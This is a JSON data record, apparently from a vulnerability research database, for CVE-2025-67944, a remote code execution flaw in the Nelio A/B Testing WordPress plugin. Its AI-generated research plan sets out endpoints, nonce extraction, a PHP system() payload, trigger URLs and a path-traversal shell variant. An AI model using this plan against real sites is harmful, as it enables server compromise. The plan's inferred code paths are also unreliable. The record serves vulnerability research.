[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fx2bCMHqXJkZjKxpbSTjy8lii7UYqS7RMEbFmMeyXNgY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":29},"CVE-2025-67944","nelio-ab-testing-authenticated-editor-remote-code-execution","Nelio AB Testing \u003C= 8.1.8 - Authenticated (Editor+) Remote Code Execution","The Nelio A\u002FB Testing – AB Tests and Heatmaps for Better Conversion Optimization plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 8.1.8. This makes it possible for authenticated attackers, with Editor-level access and above, to execute code on the server.","nelio-ab-testing",null,"\u003C=8.1.8","8.2.0","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Generation of Code ('Code Injection')","2026-01-20 00:00:00","2026-01-28 16:48:07",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd09985e9-ee18-41a0-94d0-05dd80a68ed9?source=api-prod",9,[],"researched",false,3,"This research plan targets **CVE-2025-67944**, a Remote Code Execution (RCE) vulnerability in the Nelio A\u002FB Testing plugin. The vulnerability allows users with Editor-level permissions or higher to execute arbitrary PHP code due to improper handling of \"alternatives\" or settings that are subsequently evaluated or executed on the server.\n\n---\n\n### 1. Vulnerability Summary\nThe Nelio A\u002FB Testing plugin provides a complex UI (often React-based) for creating marketing experiments. The vulnerability arises because the plugin allows Editors to save content for experiment \"alternatives\" (like Custom HTML or scripts) which is incorrectly processed on the server side. Specifically, user-supplied input is passed to a sink that executes code (such as `eval()` or writing to a `.php` file that is later `include`'d) without sufficient sanitization or a check for the `unfiltered_html` capability (which Editors have, but which should not normally grant RCE).\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** WordPress REST API or AJAX. Nelio heavily uses the REST API for its experiment editor.\n*   **Vulnerable Route:** `\u002Fwp-json\u002Fnelio-ab-testing\u002Fv1\u002Ftests` (or a similar sub-route for variants\u002Falternatives).\n*   **HTTP Method:** `POST` or `PUT`.\n*   **Payload Parameter:** Likely within the `alternatives` array, specifically in a `content`, `css`, or `js` field that the server-side rendering engine treats as PHP.\n*   **Authentication:** Authenticated, Editor-level access (`PR:H` in CVSS, but \"Editor\" in WordPress context).\n*   **Preconditions:** The Nelio A\u002FB Testing plugin must be active.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The REST API controller (e.g., `Nelio_AB_Testing_Tests_Controller`) receives a request to create or update an experiment.\n2.  **Validation:** The `update_item_permissions_check` or `create_item_permissions_check` verifies the user has the `edit_posts` capability (standard for Editors), but fails to restrict \"code-heavy\" alternatives to Administrators only.\n3.  **Data Processing:** The controller passes the experiment data to a handler (e.g., `Nelio_AB_Testing_Server::save_test`).\n4.  **The Sink:** \n    *   **Possibility A:** The plugin saves \"Custom HTML\" alternatives into a cache directory as `.php` files to allow for server-side processing\u002Fincludes during the A\u002FB test split.\n    *   **Possibility B:** The plugin uses a templating engine or a custom function that calls `eval()` on a specific field within the test configuration.\n5.  **Trigger:** The code is executed when the test is previewed or when the experiment page is visited on the frontend.\n\n### 4. Nonce Acquisition Strategy\nNelio A\u002FB Testing uses the standard WordPress REST API nonce.\n\n1.  **Identify Trigger:** The Nelio dashboard loads on pages with the slug `page=nelio-ab-testing`.\n2.  **Navigation:** Log in as an Editor and navigate to `\u002Fwp-admin\u002Fadmin.php?page=nelio-ab-testing`.\n3.  **Extraction:** The REST nonce is typically localized in the `nabSettings` or `nelioAbTesting` JavaScript object.\n4.  **Execution Agent Steps:**\n    *   `browser_navigate(\"\u002Fwp-admin\u002Fadmin.php?page=nelio-ab-testing\")`\n    *   `browser_eval(\"window.nabSettings?.nonce || window.nelioAbTestingData?.nonce\")`\n    *   *Note:* If not found there, check for the standard `wp_rest` nonce localized by WordPress: `browser_eval(\"wpApiSettings.nonce\")`.\n\n### 5. Exploitation Strategy\nThe goal is to inject PHP code into a test alternative that the plugin will execute.\n\n**Step 1: Discover existing tests or create a draft**\n*   **Request:** `GET \u002Fwp-json\u002Fnelio-ab-testing\u002Fv1\u002Ftests`\n*   **Header:** `X-WP-Nonce: [NONCE]`\n\n**Step 2: Inject RCE Payload**\nCreate a new \"Page\" test with a malicious alternative.\n*   **Request:** `POST \u002Fwp-json\u002Fnelio-ab-testing\u002Fv1\u002Ftests`\n*   **Header:** `Content-Type: application\u002Fjson`, `X-WP-Nonce: [NONCE]`\n*   **Payload (Inferred):**\n    ```json\n    {\n      \"title\": \"Exploit Test\",\n      \"type\": \"post\",\n      \"status\": \"draft\",\n      \"alternatives\": [\n        {\n          \"name\": \"Control\",\n          \"is_control\": true\n        },\n        {\n          \"name\": \"RCE Variant\",\n          \"content\": \"\u003C?php system('id > \u002Ftmp\u002Frce.txt'); phpinfo(); ?>\",\n          \"type\": \"html\"\n        }\n      ]\n    }\n    ```\n    *(Note: If \"content\" doesn't work, try fields like \"css\" or \"js\" or specific \"metadata\" fields used for server-side hooks.)*\n\n**Step 3: Trigger Execution**\nThe code might execute during a \"Preview\" action or when the test is \"started\". \n*   Attempt to preview the variant: `GET \u002F?nab=[VARIANT_ID]` or `GET \u002F?nelio_ab_preview=[TEST_ID]`.\n\n### 6. Test Data Setup\n1.  **User:** Create a user with the **Editor** role.\n2.  **Content:** Create at least one published Page.\n3.  **Plugin Config:** Ensure Nelio A\u002FB Testing is activated and the initial setup (if any) is bypassed or completed via `wp option update`.\n\n### 7. Expected Results\n*   **REST Response:** The server returns `201 Created` or `200 OK`, confirming the payload is saved in the database.\n*   **Execution:** Upon visiting the trigger URL (preview or frontend), the system command `id` executes.\n*   **Output:** The response contains the output of `phpinfo()` or the `id` command if the sink is an `eval` that echoes, or a file `\u002Ftmp\u002Frce.txt` is created if the sink is a file write.\n\n### 8. Verification Steps\n1.  **File Check:** `wp eval \"echo file_exists('\u002Ftmp\u002Frce.txt') ? 'VULNERABLE' : 'FAILED';\"`\n2.  **Database Check:** `wp post list --post_type=nab_test` (Verify the malicious test exists).\n3.  **Log Check:** Check the PHP error logs for any execution errors that reveal the path of the executed code.\n\n### 9. Alternative Approaches\n*   **Option Injection:** If the RCE is via settings, try `POST \u002Fwp-json\u002Fnelio-ab-testing\u002Fv1\u002Fsettings` with a payload injecting into a \"Global Scripts\" field.\n*   **Path Traversal + Injection:** Check if the `alternatives` allow specifying a filename. If the plugin writes to `...\u002Fnelio-ab-testing\u002Fcache\u002F[ID].php`, try to name the variant `..\u002F..\u002Fuploads\u002Fshell`.\n*   **Action\u002FFilter Hook Injection:** Some Nelio versions allow adding custom \"Hooks\". If these hooks allow raw PHP, target the REST endpoint responsible for saving experiment hooks.","gemini-3-flash-preview","2026-05-05 04:52:00","2026-05-05 04:54:05",{"type":30,"vulnerable_version":31,"fixed_version":11,"vulnerable_browse":32,"vulnerable_zip":33,"fixed_browse":34,"fixed_zip":35,"all_tags":36},"plugin","8.1.8","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnelio-ab-testing\u002Ftags\u002F8.1.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnelio-ab-testing.8.1.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnelio-ab-testing\u002Ftags\u002F8.2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnelio-ab-testing.8.2.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnelio-ab-testing\u002Ftags"]